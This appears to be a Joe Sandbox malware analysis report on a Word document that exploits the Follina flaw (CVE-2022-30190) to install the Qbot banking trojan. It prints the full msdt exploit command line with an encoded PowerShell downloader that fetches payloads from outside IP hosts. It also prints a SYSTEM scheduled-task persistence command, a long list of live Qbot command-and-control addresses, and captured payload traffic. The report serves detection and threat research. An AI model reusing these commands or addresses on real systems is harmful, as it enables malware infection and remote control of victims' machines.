Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
doc782.docx

Overview

General Information

Sample Name:doc782.docx
Analysis ID:640940
MD5:e7015438268464cedad98b1544d643ad
SHA1:03ef0e06d678a07f0413d95f0deb8968190e4f6b
SHA256:d20120cc046cef3c3f0292c6cbc406fcf2a714aa8e048c9188f1184e4bb16c93
Infos:

Detection

CryptOne, Follina CVE-2022-30190, Qbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Qbot
Multi AV Scanner detection for submitted file
Yara detected CryptOne packer
Sigma detected: Schedule system process
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 7032 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 5960 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • MSOSYNC.EXE (PID: 5160 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • msdt.exe (PID: 2984 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • csc.exe (PID: 4480 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 1124 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2969.tmp" "c:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 4384 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 4536 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4732.tmp" "c:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • regsvr32.exe (PID: 1320 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A MD5: 426E7499F6A7346F0410DEAD0805586B)
    • explorer.exe (PID: 4384 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • regsvr32.exe (PID: 5688 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A MD5: 426E7499F6A7346F0410DEAD0805586B)
    • explorer.exe (PID: 2256 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • schtasks.exe (PID: 4456 cmdline: "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06 MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 1548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • regsvr32.exe (PID: 4768 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A MD5: 426E7499F6A7346F0410DEAD0805586B)
    • explorer.exe (PID: 5492 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • csc.exe (PID: 5404 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 4496 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B1C.tmp" "c:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • regsvr32.exe (PID: 6036 cmdline: regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t1.A" MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 3976 cmdline: -s "C:\Users\user\AppData\Local\Temp\t1.A" MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

Threatname: Qbot

{"Bot id": "obama186", "Campaign": "1654596660", "Version": "403.694", "C2 list": ["67.165.206.193:993", "63.143.92.99:995", "74.14.5.179:2222", "182.191.92.203:995", "197.89.8.51:443", "89.101.97.139:443", "86.97.9.190:443", "124.40.244.115:2222", "80.11.74.81:2222", "41.215.153.104:995", "179.100.20.32:32101", "31.35.28.29:443", "202.134.152.2:2222", "109.12.111.14:443", "93.48.80.198:995", "120.150.218.241:995", "41.38.167.179:995", "177.94.57.126:32101", "173.174.216.62:443", "1.161.101.20:443", "88.224.254.172:443", "82.41.63.217:443", "67.209.195.198:443", "70.46.220.114:443", "24.178.196.158:2222", "39.44.213.68:995", "84.241.8.23:32103", "210.246.4.69:995", "92.132.172.197:2222", "91.177.173.10:995", "217.128.122.65:2222", "149.28.238.199:995", "45.76.167.26:995", "45.63.1.12:443", "144.202.2.175:443", "45.63.1.12:995", "144.202.3.39:995", "144.202.2.175:995", "45.76.167.26:443", "149.28.238.199:443", "144.202.3.39:443", "140.82.63.183:995", "140.82.63.183:443", "175.145.235.37:443", "85.246.82.244:443", "47.23.89.60:993", "187.207.131.50:61202", "176.67.56.94:443", "148.64.96.100:443", "140.82.49.12:443", "76.70.9.169:2222", "217.164.121.161:2222", "72.27.33.160:443", "108.60.213.141:443", "104.34.212.7:32103", "39.44.158.215:995", "31.48.174.63:2078", "75.99.168.194:61201", "117.248.109.38:21", "83.110.218.147:993", "82.152.39.39:443", "180.129.108.214:995", "5.32.41.45:443", "83.110.92.106:443", "197.164.182.46:993", "196.203.37.215:80", "186.90.153.162:2222", "37.186.54.254:995", "89.211.179.247:2222", "24.139.72.117:443", "201.142.177.168:443", "37.34.253.233:443", "69.14.172.24:443", "125.24.187.183:443", "208.107.221.224:443", "174.69.215.101:443", "76.25.142.196:443", "96.37.113.36:993", "173.21.10.71:2222", "73.151.236.31:443", "45.46.53.140:2222", "189.146.90.232:443", "70.51.135.90:2222", "190.252.242.69:443", "201.145.165.25:443", "47.157.227.70:443", "72.252.157.93:993", "177.205.155.85:443", "72.252.157.93:995", "187.251.132.144:22", "40.134.246.185:995", "24.55.67.176:443", "79.80.80.29:2222", "179.158.105.44:443", "72.252.157.93:990", "89.86.33.217:443", "201.172.23.68:2222", "102.182.232.3:995", "177.156.191.231:443", "39.49.96.122:995", "94.36.193.176:2222", "120.61.1.114:443", "217.164.121.161:1194", "39.41.29.200:995", "86.195.158.178:2222", "86.98.149.168:2222", "1.161.101.20:995", "124.109.35.32:995", "172.115.177.204:2222", "105.27.172.6:443", "32.221.224.140:995", "208.101.82.0:443", "71.24.118.253:443", "143.0.219.6:995", "217.165.176.49:2222", "90.120.65.153:2078", "5.203.199.157:995", "39.52.41.80:995", "148.0.56.63:443", "191.112.25.187:443", "121.7.223.45:2222", "47.156.131.10:443", "177.209.202.242:2222", "41.86.42.158:995", "106.51.48.170:50001", "41.84.229.240:443", "94.71.169.212:995", "111.125.245.116:995", "78.101.193.241:6883", "201.242.175.29:2222", "38.70.253.226:2222", "187.149.236.5:443", "217.165.79.88:443", "85.255.232.18:443", "103.246.242.202:443", "41.230.62.211:995", "67.69.166.79:2222", "42.228.224.249:2222", "172.114.160.81:995", "94.26.122.9:995", "75.99.168.194:443", "189.253.206.105:443", "81.215.196.174:443", "46.107.48.202:443"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htmMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
    • 0x1447:$re1: location.href = "ms-msdt:
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RESMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
      • 0x1447:$re1: location.href = "ms-msdt:
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RESJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16E37148.htmMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
        • 0x1447:$re1: location.href = "ms-msdt:
        Click to see the 1 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        0000001B.00000002.672940732.00000000043F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
          00000021.00000002.710753771.0000000002E60000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
            00000020.00000000.671132506.0000000002F80000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
              00000021.00000000.671727955.0000000002E60000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
                0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
                  Click to see the 18 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  27.2.regsvr32.exe.4990000.3.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                    27.2.regsvr32.exe.43f0000.1.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                      29.2.regsvr32.exe.4ad0000.2.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                        27.2.regsvr32.exe.43c0184.0.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                          28.2.regsvr32.exe.810184.0.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                            Click to see the 25 entries

                            Sigma Signatures

                            Persistence and Installation Behavior

                            barindex
                            Sigma detected: Schedule system process
                            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06, CommandLine: "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 2256, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06, ProcessId: 4456, ProcessName: schtasks.exe

                            Snort Signatures

                            Timestamp:185.234.247.119192.168.2.2280491712036726 06/07/22-19:44:37.058628
                            SID:2036726
                            Source Port:80
                            Destination Port:49171
                            Protocol:TCP
                            Classtype:Attempted User Privilege Gain

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Multi AV Scanner detection for submitted file
                            Source: doc782.docxVirustotal: Detection: 28%Perma Link
                            Source: doc782.docxReversingLabs: Detection: 17%
                            Source: 32.2.explorer.exe.2f80000.0.unpackMalware Configuration Extractor: Qbot {"Bot id": "obama186", "Campaign": "1654596660", "Version": "403.694", "C2 list": ["67.165.206.193:993", "63.143.92.99:995", "74.14.5.179:2222", "182.191.92.203:995", "197.89.8.51:443", "89.101.97.139:443", "86.97.9.190:443", "124.40.244.115:2222", "80.11.74.81:2222", "41.215.153.104:995", "179.100.20.32:32101", "31.35.28.29:443", "202.134.152.2:2222", "109.12.111.14:443", "93.48.80.198:995", "120.150.218.241:995", "41.38.167.179:995", "177.94.57.126:32101", "173.174.216.62:443", "1.161.101.20:443", "88.224.254.172:443", "82.41.63.217:443", "67.209.195.198:443", "70.46.220.114:443", "24.178.196.158:2222", "39.44.213.68:995", "84.241.8.23:32103", "210.246.4.69:995", "92.132.172.197:2222", "91.177.173.10:995", "217.128.122.65:2222", "149.28.238.199:995", "45.76.167.26:995", "45.63.1.12:443", "144.202.2.175:443", "45.63.1.12:995", "144.202.3.39:995", "144.202.2.175:995", "45.76.167.26:443", "149.28.238.199:443", "144.202.3.39:443", "140.82.63.183:995", "140.82.63.183:443", "175.145.235.37:443", "85.246.82.244:443", "47.23.89.60:993", "187.207.131.50:61202", "176.67.56.94:443", "148.64.96.100:443", "140.82.49.12:443", "76.70.9.169:2222", "217.164.121.161:2222", "72.27.33.160:443", "108.60.213.141:443", "104.34.212.7:32103", "39.44.158.215:995", "31.48.174.63:2078", "75.99.168.194:61201", "117.248.109.38:21", "83.110.218.147:993", "82.152.39.39:443", "180.129.108.214:995", "5.32.41.45:443", "83.110.92.106:443", "197.164.182.46:993", "196.203.37.215:80", "186.90.153.162:2222", "37.186.54.254:995", "89.211.179.247:2222", "24.139.72.117:443", "201.142.177.168:443", "37.34.253.233:443", "69.14.172.24:443", "125.24.187.183:443", "208.107.221.224:443", "174.69.215.101:443", "76.25.142.196:443", "96.37.113.36:993", "173.21.10.71:2222", "73.151.236.31:443", "45.46.53.140:2222", "189.146.90.232:443", "70.51.135.90:2222", "190.252.242.69:443", "201.145.165.25:443", "47.157.227.70:443", "72.252.157.93:993", "177.205.155.85:443", "72.252.157.93:995", "187.251.132.144:22", "40.134.246.185:995", "24.55.67.176:443", "79.80.80.29:2222", "179.158.105.44:443", "72.252.157.93:990", "89.86.33.217:443", "201.172.23.68:2222", "102.182.232.3:995", "177.156.191.231:443", "39.49.96.122:995", "94.36.193.176:2222", "120.61.1.114:443", "217.164.121.161:1194", "39.41.29.200:995", "86.195.158.178:2222", "86.98.149.168:2222", "1.161.101.20:995", "124.109.35.32:995", "172.115.177.204:2222", "105.27.172.6:443", "32.221.224.140:995", "208.101.82.0:443", "71.24.118.253:443", "143.0.219.6:995", "217.165.176.49:2222", "90.120.65.153:2078", "5.203.199.157:995", "39.52.41.80:995", "148.0.56.63:443", "191.112.25.187:443", "121.7.223.45:2222", "47.156.131.10:443", "177.209.202.242:2222", "41.86.42.158:995", "106.51.48.170:50001", "41.84.229.240:443", "94.71.169.212:995", "111.125.245.116:995", "78.101.193.241:6883", "201.242.175.29:2222", "38.70.253.226:2222", "187.149.236.5:443", "217.165.79.88:443", "85.255.232.18:443", "103.246.242.202:443", "41.230.62.211:995", "67.69.166.79:2222",

                            Exploits

                            barindex
                            Yara detected Microsoft Office Exploit Follina CVE-2022-30190
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htm, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16E37148.htm, type: DROPPED
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
                            Source: Binary string: amstream.pdb source: explorer.exe, 00000020.00000003.675706177.0000000005221000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.674870677.0000000004DAB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.678475892.0000000004D51000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: amstream.pdbGCTL source: explorer.exe, 00000020.00000003.675706177.0000000005221000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.674870677.0000000004DAB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.678475892.0000000004D51000.00000004.00000800.00020000.00000000.sdmp
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499BCFC FindFirstFileW,FindNextFileW,
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042ABCFC FindFirstFileW,FindNextFileW,
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AFBCFC FindFirstFileW,FindNextFileW,
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 32_2_02F8BCFC FindFirstFileW,FindNextFileW,

                            Software Vulnerabilities

                            barindex
                            Document exploit detected (process start blacklist hit)
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe
                            Source: global trafficTCP traffic: 192.168.2.5:49744 -> 185.234.247.119:80
                            Source: global trafficTCP traffic: 192.168.2.5:49763 -> 185.234.247.119:80

                            Networking

                            barindex
                            Snort IDS alert for network traffic
                            Source: TrafficSnort IDS: 2036726 ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) 185.234.247.119:80 -> 192.168.2.22:49171
                            Source: Joe Sandbox ViewASN Name: INTERKONEKT-ASPL INTERKONEKT-ASPL
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 07 Jun 2022 17:51:26 GMTContent-Type: application/octet-streamContent-Length: 1437696Connection: keep-aliveAccept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment;Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 02 11 00 00 ea 04 00 00 00 00 00 90 0d 11 00 00 10 00 00 00 20 11 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 16 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 11 00 ba 25 00 00 00 00 13 00 00 48 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 11 00 6c 53 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 f4 01 11 00 00 10 00 00 00 02 11 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 f8 27 00 00 00 20 11 00 00 28 00 00 00 06 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 71 10 00 00 00 50 11 00 00 00 00 00 00 2e 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ba 25 00 00 00 70 11 00 00 26 00 00 00 2e 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6c 53 01 00 00 a0 11 00 00 54 01 00 00 54 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 48 03 00 00 00 13 00 00 48 03 00 00 a8 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 50 16 00 00 00 00 00 00 f0 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 185.234.247.119Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 185.234.247.119If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMTIf-None-Match: "6299dd5d-1861"Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /972639944.dat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 185.234.247.119Connection: Keep-Alive
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
